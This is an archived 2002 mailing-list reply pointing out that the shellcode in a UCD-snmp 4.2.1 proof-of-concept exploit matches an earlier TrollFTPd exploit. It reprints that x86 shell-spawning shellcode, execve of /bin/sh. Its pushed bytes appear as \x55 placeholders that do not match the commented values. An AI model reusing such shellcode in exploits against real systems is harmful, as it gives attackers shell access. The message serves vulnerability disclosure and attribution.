RE: UCD-snmp 4.2.1 exploit - proof of concept

From: Mike Tone (simpletoneat_private)
Date: Tue Feb 19 2002 - 16:38:23 PST


    just to note:
    
    The shellcode is exactly the same as that from zen-parse's local exploit
    for TrollFTPd (1.26)
    
    see: http://www.securityfocus.com/archive/1/203874
    
    ----
    "\x68\x55\x55\x55\x55"       // push    dword 68732f6eh
    "\x68\x55\x55\x55\x55"       // push    dword 69622f2fh
    "\x89\xe3"                   // mov     ebx, esp
    "\x51"                       // push    ecx
    "\x53"                       // push    ebx
    "\x89\xe1"                   // mov     ecx, esp
    "\xb0\x0b"                   // mov     al, 11
    "\xcd\x80";                  // int     80h
    ----
    
    
    



    This archive was generated by hypermail 2b30 : Tue Feb 19 2002 - 22:33:37 PST